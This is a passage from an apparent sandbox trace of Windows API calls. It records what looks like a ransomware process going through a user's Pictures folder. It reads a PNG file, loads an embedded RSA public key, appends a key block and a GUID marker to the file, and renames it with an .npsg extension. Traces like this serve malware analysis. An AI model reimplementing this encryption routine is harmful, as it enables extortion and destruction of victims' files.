lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0240.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0240.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.761] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\r6Nxr\\") returned="r6Nxr\\" [0240.761] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\") returned="OHXi\\" [0240.762] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\") returned="2DVGfW2 wBKbSvaIoJ2e\\" [0240.762] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0240.762] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0240.762] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0240.762] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0240.762] PathFindFileNameW (pszPath="") returned="" [0240.762] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\r6Nxr\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b6e8ec0, ftCreationTime.dwHighDateTime=0x1d5b85b, ftLastAccessTime.dwLowDateTime=0x40a9b460, ftLastAccessTime.dwHighDateTime=0x1d5c4a1, ftLastWriteTime.dwLowDateTime=0x40a9b460, ftLastWriteTime.dwHighDateTime=0x1d5c4a1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0240.762] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b6e8ec0, ftCreationTime.dwHighDateTime=0x1d5b85b, ftLastAccessTime.dwLowDateTime=0x40a9b460, ftLastAccessTime.dwHighDateTime=0x1d5c4a1, ftLastWriteTime.dwLowDateTime=0x40a9b460, ftLastWriteTime.dwHighDateTime=0x1d5c4a1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0240.762] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9edf11b0, ftCreationTime.dwHighDateTime=0x1d5bde4, ftLastAccessTime.dwLowDateTime=0x92eddb70, ftLastAccessTime.dwHighDateTime=0x1d5bb05, ftLastWriteTime.dwLowDateTime=0x92eddb70, ftLastWriteTime.dwHighDateTime=0x1d5bb05, nFileSizeHigh=0x0, nFileSizeLow=0x45d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xQc3wz.png", cAlternateFileName="")) returned 1 [0240.763] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\r6Nxr\\xQc3wz.png") returned=".png" [0240.763] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\r6Nxr\\xQc3wz.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\ohxi\\r6nxr\\xqc3wz.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0240.763] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=17872) returned 1 [0240.763] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0240.766] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x45aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.766] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0240.768] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x45d0, lpOverlapped=0x0) returned 1 [0240.768] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.768] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.768] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.769] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a3b8) returned 1 [0240.770] CryptCreateHash (in: hProv=0x67a3b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0240.770] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0240.770] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0240.770] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0240.770] GetLastError () returned 0x0 [0240.770] CryptDestroyHash (hHash=0x33f0408) returned 1 [0240.770] CryptReleaseContext (hProv=0x67a3b8, dwFlags=0x0) returned 1 [0240.770] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0240.770] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0240.770] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0240.770] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0240.771] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x45d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.771] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0240.771] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0240.771] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0240.771] CloseHandle (hObject=0x644) returned 1 [0240.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393c58 [0240.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b89cd0 [0240.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393c58 | out: hHeap=0x620000) returned 1 [0240.773] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\r6Nxr\\xQc3wz.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\ohxi\\r6nxr\\xqc3wz.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\r6Nxr\\xQc3wz.png.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\ohxi\\r6nxr\\xqc3wz.png.npsg")) returned 1 [0240.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0240.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0240.774] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0240.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x708b30 | out: hHeap=0x620000) returned 1 [0240.775] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9edf11b0, ftCreationTime.dwHighDateTime=0x1d5bde4, ftLastAccessTime.dwLowDateTime=0x92eddb70, ftLastAccessTime.dwHighDateTime=0x1d5bb05, ftLastWriteTime.dwLowDateTime=0x92eddb70, ftLastWriteTime.dwHighDateTime=0x1d5bb05, nFileSizeHigh=0x0, nFileSizeLow=0x45d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xQc3wz.png", cAlternateFileName="")) returned 0 [0240.775] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0240.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0240.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e7c0 | out: hHeap=0x620000) returned 1 [0240.776] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0240.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e7c0 [0240.776] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0240.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0240.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.779] HeapFree (in: 